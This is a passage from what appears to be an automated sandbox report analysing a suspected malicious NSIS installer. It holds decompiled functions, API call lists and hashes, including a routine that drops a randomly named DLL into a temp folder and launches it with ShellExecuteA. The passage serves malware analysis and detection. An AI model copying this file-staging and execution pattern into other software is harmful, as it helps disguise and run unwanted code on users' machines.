                                                                              • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                              Strings
                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
                                                                              • *?|<>/":, xrefs: 00405C43
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                              • API String ID: 589700163-489697304
                                                                              • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                              • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
                                                                              • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                              • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00403E0E, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                              0x00403e20
                                                                              0x00403eb4
                                                                              0x00000000
                                                                              0x00403eb4
                                                                              0x00403e31
                                                                              0x00403e35
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403e3b
                                                                              0x00403e44
                                                                              0x00403e47
                                                                              0x00403e47
                                                                              0x00403e4d
                                                                              0x00403e53
                                                                              0x00403e53
                                                                              0x00403e5f
                                                                              0x00403e65
                                                                              0x00403e6c
                                                                              0x00403e6f
                                                                              0x00403e72
                                                                              0x00403e74
                                                                              0x00403e74
                                                                              0x00403e7c
                                                                              0x00403e82
                                                                              0x00403e82
                                                                              0x00403e8c
                                                                              0x00403e91
                                                                              0x00403e94
                                                                              0x00403e99
                                                                              0x00403e9c
                                                                              0x00403e9c
                                                                              0x00403eac
                                                                              0x00403eac
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                              • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
                                                                              • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                              • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040166B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringfileCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E0040166B() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A9A(0xffffffd0);
				 *(_t35 - 8) = E00402A9A(0xffffffdf);
				E004059BF(0x40a018,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x40a018, 0x40901c);
					lstrcatA(0x40a018,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						E00405707( *(_t35 + 8),  *(_t35 - 8));
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401428();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}






                                                                              0x00401674
                                                                              0x00401684
                                                                              0x00401688
                                                                              0x00401690
                                                                              0x004016a7
                                                                              0x004016af
                                                                              0x004016b8
                                                                              0x004016b8
                                                                              0x004016cb
                                                                              0x004016d7
                                                                              0x004026da
                                                                              0x004016ed
                                                                              0x004016f3
                                                                              0x004016f8
                                                                              0x00000000
                                                                              0x004016f8
                                                                              0x004016cd
                                                                              0x004016cd
                                                                              0x004021e8
                                                                              0x004021e8
                                                                              0x004021e8
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                                • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,?,000000DF,000000D0), ref: 00401690
                                                                              • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,?,000000DF,000000D0), ref: 0040169A
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,?,000000DF,000000D0), ref: 004016AF
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,?,000000DF,000000D0), ref: 004016B8
                                                                                • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ), ref: 00405CA2
                                                                                • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                                • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                                • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                                • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                                • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405765
                                                                                • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405782
                                                                                • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
                                                                                • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                                • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                                • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                                • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                                • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                                • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                              • MoveFileA.KERNEL32 ref: 004016C3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
                                                                              • API String ID: 2621199633-483980473
                                                                              • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                              • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
                                                                              • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                              • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00404627, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00404627(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                              0x00404635
                                                                              0x00404642
                                                                              0x00404648
                                                                              0x00404686
                                                                              0x00404686
                                                                              0x00404695
                                                                              0x0040469c
                                                                              0x00000000
                                                                              0x0040469e
                                                                              0x0040464a
                                                                              0x00404659
                                                                              0x00404661
                                                                              0x00404664
                                                                              0x00404676
                                                                              0x0040467c
                                                                              0x00404683
                                                                              0x00000000
                                                                              0x00404683
                                                                              0x00000000

                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
                                                                              • GetMessagePos.USER32 ref: 0040464A
                                                                              • ScreenToClient.USER32 ref: 00404664
                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: Message$Send$ClientScreen
                                                                              • String ID: f
                                                                              • API String ID: 41195575-1993550816
                                                                              • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                              • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
                                                                              • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
                                                                              • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00402BAB, Relevance: 9.0, APIs: 6, Instructions: 48timeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
				int _t7;
				int _t15;
				struct HWND__* _t16;

				_t16 = _a4;
				if(_a8 == 0x110) {
					SetTimer(_t16, 1, 0xfa, 0);
					_a8 = 0x113;
					 *0x40b020 = _a16;
				}
				if(_a8 == 0x113) {
					_t15 =  *0x789930; // 0x32903
					_t7 =  *0x79d938; // 0x32907
					if(_t15 >= _t7) {
						_t15 = _t7;
					}
					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
					SetWindowTextA(_t16, 0x7898f0);
					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
					ShowWindow(_t16, 5);
				}
				return 0;
			}






                                                                              0x00402bb7
                                                                              0x00402bbf
                                                                              0x00402bcb
                                                                              0x00402bd4
                                                                              0x00402bd7
                                                                              0x00402bd7
                                                                              0x00402bdf
                                                                              0x00402be1
                                                                              0x00402be7
                                                                              0x00402bee
                                                                              0x00402bf0
                                                                              0x00402bf0
                                                                              0x00402c09
                                                                              0x00402c14
                                                                              0x00402c21
                                                                              0x00402c29
                                                                              0x00402c29
                                                                              0x00402c34

                                                                              APIs
                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
                                                                              • MulDiv.KERNEL32(00032903,00000064,00032907), ref: 00402BF6
                                                                              • wsprintfA.USER32 ref: 00402C09
                                                                              • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
                                                                              • SetDlgItemTextA.USER32 ref: 00402C21
                                                                              • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: TextWindow$ItemShowTimerwsprintf
                                                                              • String ID:
                                                                              • API String ID: 559026099-0
                                                                              • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                              • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
                                                                              • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
                                                                              • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401E34, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 64%
                                                                              			E00401E34() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9A(_t19);
				_t20 = E00402A9A(0x31);
				_t7 = E00402A9A(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\hardz\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}








                                                                              0x00401e3c
                                                                              0x00401e45
                                                                              0x00401e47
                                                                              0x00401e4c
                                                                              0x00401e4d
                                                                              0x00401e58
                                                                              0x00401e5a
                                                                              0x00401e65
                                                                              0x00401e71
                                                                              0x00401e7f
                                                                              0x00401e91
                                                                              0x004026da
                                                                              0x004026da
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 00401E5A
                                                                              • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
                                                                              Strings
                                                                              • %s %s, xrefs: 00401E4E
                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
                                                                              • C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll, xrefs: 00401E53
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: ExecuteShellwsprintf
                                                                              • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
                                                                              • API String ID: 2956387742-1368271051
                                                                              • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                              • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
                                                                              • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
                                                                              • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00402ADA, Relevance: 7.6, APIs: 5, Instructions: 51registryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t14;

				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
				if(_t14 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						if(E00402ADA(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					return RegDeleteKeyA(_a4, _a8);
				}
				return _t14;
			}






                                                                              0x00402af5
                                                                              0x00402afd
                                                                              0x00402b25
                                                                              0x00402b0f
                                                                              0x00402b56
                                                                              0x00000000
                                                                              0x00402b5e
                                                                              0x00402b23
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402b23
                                                                              0x00402b3a
                                                                              0x00000000
                                                                              0x00402b46
                                                                              0x00402b50

                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: Close$DeleteEnumOpen
                                                                              • String ID:
                                                                              • API String ID: 1912718029-0
                                                                              • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                              • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                                                              • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                                                              • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401D32, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00401D32() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                              0x00401d3e
                                                                              0x00401d45
                                                                              0x00401d74
                                                                              0x00401d7c
                                                                              0x00401d83
                                                                              0x00401d83
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                              • GetDlgItem.USER32 ref: 00401D38
                                                                              • GetClientRect.USER32 ref: 00401D45
                                                                              • LoadImageA.USER32 ref: 00401D66
                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                                                              • DeleteObject.GDI32(00000000), ref: 00401D83
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                                                              • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
                                                                              • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
